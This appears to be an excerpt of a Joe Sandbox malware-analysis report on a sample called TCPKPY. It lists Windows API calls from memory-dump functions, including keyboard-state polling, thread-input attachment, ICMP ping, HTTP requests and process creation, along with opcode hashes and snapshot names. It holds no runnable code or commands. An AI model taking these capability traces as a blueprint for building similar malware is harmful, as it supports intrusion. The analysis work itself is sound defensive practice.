• GetMenuItemID.USER32(?,00000000), ref: 0024591F
• GetMenuItemID.USER32(?,-00000001), ref: 00245949
• GetMenuItemID.USER32(?,?), ref: 0024598E
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002459D4
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002459E8
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00245A09
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00269AA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00269AA8
• GetWindowLongW.USER32(?,000000F0), ref: 00269ACC
• _memset.LIBCMT ref: 00269ADD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00269AEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00269B67
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
• GetKeyboardState.USER32(?), ref: 00243591
• GetAsyncKeyState.USER32(000000A0), ref: 00243612
• GetKeyState.USER32(000000A0), ref: 0024362D
• GetAsyncKeyState.USER32(000000A1), ref: 00243647
• GetKeyState.USER32(000000A1), ref: 0024365C
• GetAsyncKeyState.USER32(00000011), ref: 00243674
• GetKeyState.USER32(00000011), ref: 00243686
• GetAsyncKeyState.USER32(00000012), ref: 0024369E
• GetKeyState.USER32(00000012), ref: 002436B0
• GetAsyncKeyState.USER32(0000005B), ref: 002436C8
• GetKeyState.USER32(0000005B), ref: 002436DA
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0023A2AA
• SafeArrayAllocData.OLEAUT32(?), ref: 0023A2F5
• VariantInit.OLEAUT32(?), ref: 0023A307
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0023A327
• VariantCopy.OLEAUT32(?,?), ref: 0023A36A
• SafeArrayUnaccessData.OLEAUT32(?), ref: 0023A37E
• VariantClear.OLEAUT32(?), ref: 0023A393
• SafeArrayDestroyData.OLEAUT32(?), ref: 0023A3A0
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023A3A9
• VariantClear.OLEAUT32(?), ref: 0023A3BB
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0023A3C6
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
  • Part of subcall function 002084A6: __swprintf.LIBCMT ref: 002084E5
  • Part of subcall function 002084A6: __itow.LIBCMT ref: 00208519
• CoInitialize.OLE32 ref: 0025B298
• CoUninitialize.OLE32 ref: 0025B2A3
• CoCreateInstance.OLE32(?,00000000,00000017,0028D8FC,?), ref: 0025B303
• IIDFromString.OLE32(?,?), ref: 0025B376
• VariantInit.OLEAUT32(?), ref: 0025B410
• VariantClear.OLEAUT32(?), ref: 0025B471
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 002586F5
• inet_addr.WSOCK32(?,?,?), ref: 0025873A
• gethostbyname.WSOCK32(?), ref: 00258746
• IcmpCreateFile.IPHLPAPI ref: 00258754
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002587C4
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002587DA
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 0025884F
• WSACleanup.WSOCK32 ref: 00258855
Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                • String ID: Ping
                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                • Opcode ID: fc756f3f117749c6eb9c63b4deb84d610b0e21f939b172659bb41f5494622307
                                                                                                                • Instruction ID: d523825c2848ae053ccdc3d9c6881cf03fbdaf4e78aceaed8e3577c76097eb17
                                                                                                                • Opcode Fuzzy Hash: fc756f3f117749c6eb9c63b4deb84d610b0e21f939b172659bb41f5494622307
                                                                                                                • Instruction Fuzzy Hash: EC5182356243019FD710EF20DC89B6AB7E4EF48725F144929F956AB2E1DBB0E828CF45
APIs
• _memset.LIBCMT ref: 00269C68
• CreateMenu.USER32 ref: 00269C83
• SetMenu.USER32(?,00000000), ref: 00269C92
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00269D1F
• IsMenu.USER32(?), ref: 00269D35
• CreatePopupMenu.USER32 ref: 00269D3F
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00269D70
• DrawMenuBar.USER32 ref: 00269D7E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0
• API String ID: 176399719-4108050209
• Opcode ID: 851c7df1465febef1abadba273dce0143b980bb6f64f1f3e0cb5287230fba4e5
• Instruction ID: 9357d5dbca3cda5ee37ec708d2f69e3c6f2b18bfe5e378d97afae2d5ac4931ae
• Opcode Fuzzy Hash: 851c7df1465febef1abadba273dce0143b980bb6f64f1f3e0cb5287230fba4e5
• Instruction Fuzzy Hash: 2C416D7961120AEFDB10EF64E948FEA7BB9FF49314F140029E94597391DB30A9A4CF50
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0024EC1E
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0024EC94
• GetLastError.KERNEL32 ref: 0024EC9E
• SetErrorMode.KERNEL32(00000000,READY), ref: 0024ED0B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: a2bdbdb346ca089498539e57504295a64084cae4211f37d022735a51409e4cfe
• Instruction ID: d88cfdf3b7b106691ab486351186cc5c1458f214272ed5d7bc47f79efbdfbb42
• Opcode Fuzzy Hash: a2bdbdb346ca089498539e57504295a64084cae4211f37d022735a51409e4cfe
• Instruction Fuzzy Hash: 9131B235A20306AFEB04EF64C989EAEB7B4FF44710F114016E506D72D2DB719961CB91
APIs
  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0023C782
• GetDlgCtrlID.USER32 ref: 0023C78D
• GetParent.USER32 ref: 0023C7A9
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0023C7AC
• GetDlgCtrlID.USER32(?), ref: 0023C7B5
• GetParent.USER32(?), ref: 0023C7D1
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0023C7D4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_memmove
• String ID: ComboBox$ListBox
• API String ID: 313823418-1403004172
• Opcode ID: 3dcbba04314db380024a138a1c52e6351e56a59c07172faf6d1b1ba5d61fd554
• Instruction ID: d8faa6880bfbdf2ef3658b2fc22c79b08cd346a6bdd2ee19c558359e96996a7a
• Opcode Fuzzy Hash: 3dcbba04314db380024a138a1c52e6351e56a59c07172faf6d1b1ba5d61fd554
• Instruction Fuzzy Hash: AA2192B8A10218ABDF05EB64DC85DBEB769EB45310F204115F951A71D2DB7458299F20
APIs
  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0023C869
• GetDlgCtrlID.USER32 ref: 0023C874
• GetParent.USER32 ref: 0023C890
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0023C893
• GetDlgCtrlID.USER32(?), ref: 0023C89C
• GetParent.USER32(?), ref: 0023C8B8
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0023C8BB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_memmove
• String ID: ComboBox$ListBox
• API String ID: 313823418-1403004172
• Opcode ID: f75f1b601a2a82d05e39ad4d9666d52b9b48fc29021f4063342b1fe4625afc29
• Instruction ID: c6cc98c5ee992e84f765a9be49bf3fc1e4c4d2ccf8d64030c2b915adc22a83df
• Opcode Fuzzy Hash: f75f1b601a2a82d05e39ad4d9666d52b9b48fc29021f4063342b1fe4625afc29
• Instruction Fuzzy Hash: 0421A1B9A11208ABDF01AF64DC85EFEB769EF45300F204115F551E31D2EB7459299F20
APIs
• GetParent.USER32 ref: 0023C8D9
• GetClassNameW.USER32(00000000,?,00000100), ref: 0023C8EE
• _wcscmp.LIBCMT ref: 0023C900
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0023C97B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: c02d88485f276384c072dd4260d6c7a573a70749117ca1c3e9d13cf9f601a50f
• Instruction ID: e5fa2f5ed6d58abfd5540069fe15bcadb4b5a26f0a4d5864683b10de4f20f4d3
• Opcode Fuzzy Hash: c02d88485f276384c072dd4260d6c7a573a70749117ca1c3e9d13cf9f601a50f
• Instruction Fuzzy Hash: 3E11A7BA678317B9F6042A20BC0AEB667AC9B17768F310122F900B50D2FFA169364654
APIs
• VariantInit.OLEAUT32(?), ref: 0025B777
• CoInitialize.OLE32(00000000), ref: 0025B7A4
• CoUninitialize.OLE32 ref: 0025B7AE
• GetRunningObjectTable.OLE32(00000000,?), ref: 0025B8AE
• SetErrorMode.KERNEL32(00000001,00000029), ref: 0025B9DB
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0025BA0F
• CoGetObject.OLE32(?,00000000,0028D91C,?), ref: 0025BA32
• SetErrorMode.KERNEL32(00000000), ref: 0025BA45
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0025BAC5
• VariantClear.OLEAUT32(0028D91C), ref: 0025BAD5
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: edb9c341d18129c29d9ea38313cd9ab131fde33f2bef98bff250c4cbb8994d25
• Instruction ID: f82e9445f4582bbcba0d7b2cef82f2dfc867c6a4942ad91900d06e22f198dc88
• Opcode Fuzzy Hash: edb9c341d18129c29d9ea38313cd9ab131fde33f2bef98bff250c4cbb8994d25
• Instruction Fuzzy Hash: C4C154B1628301AFC700EF68C88492BB7E9FF89315F04491DF98A9B251DB70ED19CB52
APIs
• SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0024B137
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00244A7D
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00243AD7,?,00000001), ref: 00244A91
• GetWindowThreadProcessId.USER32(00000000), ref: 00244A98
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00243AD7,?,00000001), ref: 00244AA7
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00244AB9
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00243AD7,?,00000001), ref: 00244AD2
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00243AD7,?,00000001), ref: 00244AE4
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00243AD7,?,00000001), ref: 00244B29
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00243AD7,?,00000001), ref: 00244B3E
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00243AD7,?,00000001), ref: 00244B49
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• GetClientRect.USER32(?), ref: 0027EC32
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0027EC49
• GetWindowDC.USER32(?), ref: 0027EC55
• GetPixel.GDI32(00000000,?,?), ref: 0027EC64
• ReleaseDC.USER32(?,00000000), ref: 0027EC76
• GetSysColor.USER32(00000005), ref: 0027EC94
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
APIs
• EnumChildWindows.USER32(?,0023DD46), ref: 0023DC86
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 0021C2D2
  • Part of subcall function 0021C697: GetClientRect.USER32(?,?), ref: 0021C6C0
  • Part of subcall function 0021C697: GetWindowRect.USER32(?,?), ref: 0021C701
  • Part of subcall function 0021C697: ScreenToClient.USER32(?,?), ref: 0021C729
• GetDC.USER32 ref: 0027E006
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0027E019
• SelectObject.GDI32(00000000,00000000), ref: 0027E027
• SelectObject.GDI32(00000000,00000000), ref: 0027E03C
• ReleaseDC.USER32(?,00000000), ref: 0027E044
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0027E0CF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
  • Part of subcall function 0021B736: GetCursorPos.USER32(000000FF), ref: 0021B749
  • Part of subcall function 0021B736: ScreenToClient.USER32(00000000,000000FF), ref: 0021B766
  • Part of subcall function 0021B736: GetAsyncKeyState.USER32(00000001), ref: 0021B78B
  • Part of subcall function 0021B736: GetAsyncKeyState.USER32(00000002), ref: 0021B799
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0026EB0E
• ImageList_EndDrag.COMCTL32 ref: 0026EB14
• ReleaseCapture.USER32 ref: 0026EB1A
• SetWindowTextW.USER32(?,00000000), ref: 0026EBC2
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0026EBD5
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0026ECAE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00254C5E
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00254C8A
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00254CCC
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00254CE1
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00254CEE
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00254D1E
• InternetCloseHandle.WININET(00000000), ref: 00254D65
  • Part of subcall function 002556A9: GetLastError.KERNEL32(?,?,00254A2B,00000000,00000000,00000001), ref: 002556BE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0029DBF0), ref: 0025BBA1
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0029DBF0), ref: 0025BBD5
                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0025BD33
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0025BD5D
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,0029DBF0), ref: 0025BEAD
                                                                                                                • ProgIDFromCLSID.OLE32(?,?,?,0029DBF0), ref: 0025BEF7
                                                                                                                • CoTaskMemFree.OLE32(?,?,?,0029DBF0), ref: 0025BF14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                • String ID:
                                                                                                                • API String ID: 793797124-0
                                                                                                                • Opcode ID: bfabad0f6630274cfa2ff211172b76e69e979aebc0de1b04e9429b83fc0b1e25
                                                                                                                • Instruction ID: bbe58cf79cb708b2297fb664482d17dfca55b4e080824483e9435e141bce78ba
                                                                                                                • Opcode Fuzzy Hash: bfabad0f6630274cfa2ff211172b76e69e979aebc0de1b04e9429b83fc0b1e25
                                                                                                                • Instruction Fuzzy Hash: A7F15A75A10209EFCB05DFA4C888EAEB7B9FF88315F108059F905AB250DB71AE55CF94
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 002623E6
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00262579
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0026259D
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002625DD
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002625FF
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00262760
                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00262792
                                                                                                                • CloseHandle.KERNEL32(?), ref: 002627C1
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00262838
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                 • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4090791747-0
